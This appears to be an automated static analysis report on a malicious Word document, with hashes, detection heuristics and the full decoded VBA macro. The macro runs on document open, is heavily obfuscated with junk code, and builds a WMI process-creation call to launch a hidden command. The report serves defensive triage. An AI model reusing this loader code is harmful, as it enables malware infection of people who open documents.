Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7a6440a9f3f01a24…

MALICIOUS

Office (OLE)

138.5 KB Created: 2021-01-25 09:18:00 Authoring application: Microsoft Office Word First seen: 2021-02-19
MD5: 49ceaa56c764bf82db474203b30b9ee1 SHA-1: 8e29c08a3653b61e363bccb402c7effe5db388bb SHA-256: 7a6440a9f3f01a2499d059c1ce8ab5587cbc30af01e8260f67c8888244eb1cb1
172 Risk Score

Heuristics 7

  • ClamAV: Doc.Malware.Valyria-10034158-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10034158-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set N0jfgbdcexmfr = VBA.GetObject(Whsg9jxi_om)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8473 bytes
SHA-256: 2b8afd212b0a2ad26a917e5368163e3c32e5256aa102f773d94d8a58600b403d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
92 of 154 identifiers look randomly generated (e.g. 'Prp0rgc35w3gkhpk3u'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ynzysnuyyfihfq23d"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_open()
Oxx2xwfkfk7ikbf9w
End Sub

Attribute VB_Name = "Pc1nzntniqj_dur51"
     

Attribute VB_Name = "Jlzk8qsqcshl6jk"
Function Oxx2xwfkfk7ikbf9w()
   GoTo aRiqA
    Const BjxaCGJ As String = "A"
    Const xolsDFAoA As String = ","
    Const Ikdha As String = "*high*,*critic*"
    Dim ihJfBp As Range: Set ihJfBp = Array((BjxaCGJ), Target)
    If ihJfBp Is Nothing Then
    End If
    Dim URsHL() As String: URsHL = Split(Ikdha, xolsDFAoA)
aRiqA:
skuwd = Z3neypc4_6hl3z + Ynzysnuyyfihfq23d _
. _
Content + Q955il2wdzr2d8fc1a
   GoTo qckhE
    Const szAVCX As String = "A"
    Const ZDFvjGA As String = ","
    Const wefyBED As String = "*high*,*critic*"
    Dim YqzDYkkZ As Range: Set YqzDYkkZ = Array((szAVCX), Target)
    If YqzDYkkZ Is Nothing Then
    End If
    Dim LPhmsCuzH() As String: LPhmsCuzH = Split(wefyBED, ZDFvjGA)
qckhE:
mjbBYHhbs = "ns wu db " + "ndpns wu db nd"
T0lomy3trzjqt6zc = "ns wu db ndrons wu db ndns wu db ndc" + "ens wu db ndsns wu db ndsns wu db ndns wu db nd"
   GoTo BcOIJEb
    Const IzaGEVCD As String = "A"
    Const frXBRIAUC As String = ","
    Const liXWDHf As String = "*high*,*critic*"
    Dim BBKJHBtF As Range: Set BBKJHBtF = Array((IzaGEVCD), Target)
    If BBKJHBtF Is Nothing Then
    End If
    Dim vXKNhR() As String: vXKNhR = Split(liXWDHf, frXBRIAUC)
BcOIJEb:
T0_pq5at6a81jt230i = "ns wu db nd:wns wu db ndns w" + "u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
   GoTo NjfVZEH
    Const cujVJONG As String = "A"
    Const zrdcAzBue As String = ","
    Const FwnlEcJ As String = "*high*,*critic*"
    Dim MemVBBC As Range: Set MemVBBC = Array((cujVJONG), Target)
    If MemVBBC Is Nothing Then
    End If
    Dim XCCUFUDF() As String: XCCUFUDF = Split(FwnlEcJ, zrdcAzBue)
NjfVZEH:
T2kyo942hf2v = "wns wu db ndi" + "nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
   GoTo dDVvDFyJ
    Const KTwdM As String = "A"
    Const kOGmA As String = ","
    Const bvWlGF As String = "*high*,*critic*"
    Dim CivKlI As Range: Set CivKlI = Array((KTwdM), Target)
    If CivKlI Is Nothing Then
    End If
    Dim BJuiHE() As String: BJuiHE = Split(bvWlGF, kOGmA)
dDVvDFyJ:
X8gbzx64bs3 = "ns wu db ndns wu db nd" + Mid(Application.Name, 60 / 10, 1) + "ns wu db ndns wu db nd"
   GoTo OMnbClgE
    Const NABiUJmBA As String = "A"
    Const TTSSDBE As String = ","
    Const zWNhsCZ As String = "*high*,*critic*"
    Dim hpBCIH As Range: Set hpBCIH = Array((NABiUJmBA), Target)
    If hpBCIH Is Nothing Then
    End If
    Dim tkDRHFKIL() As String: tkDRHFKIL = Split(zWNhsCZ, TTSSDBE)
OMnbClgE:
Cr4f505hg7vldsf0c = T2kyo942hf2v + X8gbzx64bs3 + T0_pq5at6a81jt230i + mjbBYHhbs + T0lomy3trzjqt6zc
   GoTo LIJNuGn
    Const yoxbGFcFG As String = "A"
    Const EBzng As String = ","
    Const WnGZXISGD As String = "*high*,*critic*"
    Dim TtymyqHC As Range: Set TtymyqHC = Array((yoxbGFcFG), Target)
    If TtymyqHC Is Nothing Then
    End If
    Dim kzJQDGJE() As String: kzJQDGJE = Split(WnGZXISGD, EBzng)
LIJNuGn:
Whsg9jxi_om = Prp0rgc35w3gkhpk3u(Cr4f505hg7vldsf0c)
   GoTo IfwvovBbI
    Const nUCpSBGl As String = "A"
    Const dGHeiB As String = ","
    Const DfLwCIJs As String = "*high*,*critic*"
    Dim wPwsfD As Range: Set wPwsfD = Array((nUCpSBGl), Target)
    If wPwsfD Is Nothing Then
    End If
    Dim GwCvEyD() As String: GwCvEyD = Split(DfLwCIJs, dGHeiB)
IfwvovBbI:
Set N0jfgbdcexmfr = VBA.GetObject(Whsg9jxi_om)
   GoTo mgbUQB
    Const ODzQPrd As String = "A"
    Const gHvzZ As String = ","
    Const gzqiCG As String = "*high*,*critic*"
    Dim kqPZDRGh As Range: Set kqPZDRGh = Array((ODzQPrd), Target)
    If kqPZDRGh Is Nothing Then
    End If
    Dim eFJdCEIGJ() As String: eFJdCEIGJ = Split(gzqiCG, gHvzZ)
mgbUQB:
mxkikw = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))
pqwm = Prp0rgc35w3gkhpk3u(mxkikw)
   GoTo SdmZKHA
    Const JoWtI As String = "A"
    Const RzBkG As String = ","
    Const RoGdiLo As String = "*high*,*critic*"
    Dim WTESfHHbE As Range: Set WTESfHHbE = Array((JoWtI), Target)
    If WTESfHHbE Is Nothing Then
    End If
    Dim AsczD() As String: AsczD = Split(RoGdiLo, RzBkG)
SdmZKHA:
N0jfgbdcexmfr.Create pqwm, Nbpclsvfxustc, I85a5jzr195h
   GoTo woXMHFAWj
    Const tTYAKI As String = "A"
    Const NPikOxWEE As String = ","
    Const wGGXPWXvH As String = "*high*,*critic*"
    Dim eBdxEG As Range: Set eBdxEG = Array((tTYAKI), Target)
    If eBdxEG Is Nothing Then
    End If
    Dim GpgYnI() As String: GpgYnI = Split(wGGXPWXvH, NPikOxWEE)
woXMHFAWj:
End Function
Function Prp0rgc35w3gkhpk3u(Zdvjtoaydjbgx6nno)
On Error Resume Next
   GoTo mQJJC
    Const RCizEteb As String = "A"
    Const fcMsqBqHS As String = ","
    Const eiWFHgJI As String = "*high*,*critic*"
    Dim HiXlCAMl As Range: Set HiXlCAMl = Array((RCizEteb), Target)
    If HiXlCAMl Is Nothing Then
    End If
    Dim HKGPhf() As String: HKGPhf = Split(eiWFHgJI, fcMsqBqHS)
mQJJC:
S4z44a_rm07 = Zdvjtoaydjbgx6nno
   GoTo qabazEA
    Const TWtrFHKBF As String = "A"
    Const UFSXB As String = ","
    Const SwIwjFCGt As String = "*high*,*critic*"
    Dim tfUFkPBI As Range: Set tfUFkPBI = Array((TWtrFHKBF), Target)
    If tfUFkPBI Is Nothing Then
    End If
    Dim GwBkDZG() As String: GwBkDZG = Split(SwIwjFCGt, UFSXB)
qabazEA:
Zo3kx9wgfsdgp2v = Bsmpx01xdp1btsbzx(S4z44a_rm07)
   GoTo IAZNKNFF
    Const QhLjEC As String = "A"
    Const TmaaI As String = ","
    Const QTrqHnpVB As String = "*high*,*critic*"
    Dim MFOcG As Range: Set MFOcG = Array((QhLjEC), Target)
    If MFOcG Is Nothing Then
    End If
    Dim tllnMEB() As String: tllnMEB = Split(QTrqHnpVB, TmaaI)
IAZNKNFF:
Prp0rgc35w3gkhpk3u = Zo3kx9wgfsdgp2v
   GoTo dxujxGCSH
    Const GvzsBP As String = "A"
    Const VkIrTt As String = ","
    Const OhlNFI As String = "*high*,*critic*"
    Dim wxhyXoc As Range: Set wxhyXoc = Array((GvzsBP), Target)
    If wxhyXoc Is Nothing Then
    End If
    Dim JHxtqF() As String: JHxtqF = Split(OhlNFI, VkIrTt)
dxujxGCSH:
End Function
Function Bsmpx01xdp1btsbzx(Oe3lz2kgadv0)
   GoTo tFQrUF
    Const FQbNABABD As String = "A"
    Const bhdApJCs As String = ","
    Const wrBNJ As String = "*high*,*critic*"
    Dim VCOQBBJME As Range: Set VCOQBBJME = Array((FQbNABABD), Target)
    If VCOQBBJME Is Nothing Then
    End If
    Dim AndgBCK() As String: AndgBCK = Split(wrBNJ, bhdApJCs)
tFQrUF:
   GoTo YeFGHHg
    Const YoONRCDR As String = "A"
    Const NRCfdB As String = ","
    Const BkXdJC As String = "*high*,*critic*"
    Dim xhvKHu As Range: Set xhvKHu = Array((YoONRCDR), Target)
    If xhvKHu Is Nothing Then
    End If
    Dim zaPgDlYE() As String: zaPgDlYE = Split(BkXdJC, NRCfdB)
YeFGHHg:
   GoTo VGJvOIo
    Const IcMvJH As String = "A"
    Const nMrFDxBZ As String = ","
    Const DOTbEvAC As String = "*high*,*critic*"
    Dim DWDXCYzB As Range: Set DWDXCYzB = Array((IcMvJH), Target)
    If DWDXCYzB Is Nothing Then
    End If
    Dim gFPNA() As String: gFPNA = Split(DOTbEvAC, nMrFDxBZ)
VGJvOIo:
Bsmpx01xdp1btsbzx = Replace(Oe3lz2kgadv0, "ns w" + "u db nd", Kef0mya01bb)
   GoTo HJbpE
    Const jvKCCCN As String = "A"
    Const mpLEDLwAI As String = ","
    Const ymBRCJA As String = "*high*,*critic*"
    Dim lJxIKkhCA As Range: Set lJxIKkhCA = Array((jvKCCCN), Target)
    If lJxIKkhCA Is Nothing Then
    End If
    Dim UNxmoIDW() As String: UNxmoIDW = Split(ymBRCJA, mpLEDLwAI)
HJbpE:
   GoTo AEmiPt
    Const nXOBD As String = "A"
    Const PCZMFnb As String = ","
    Const aspdJ As String = "*high*,*critic*"
    Dim kYSmGCjDH As Range: Set kYSmGCjDH = Array((nXOBD), Target)
    If kYSmGCjDH Is Nothing Then
    End If
    Dim xqRcJHJC() As String: xqRcJHJC = Split(aspdJ, PCZMFnb)
AEmiPt:
   GoTo uPBZMu
    Const RPnSaCJu As String = "A"
    Const UdmGIddWE As String = ","
    Const kvSXRJ As String = "*high*,*critic*"
    Dim UByHC As Range: Set UByHC = Array((RPnSaCJu), Target)
    If UByHC Is Nothing Then
    End If
    Dim LIhSwfESI() As String: LIhSwfESI = Split(kvSXRJ, UdmGIddWE)
uPBZMu:
End Function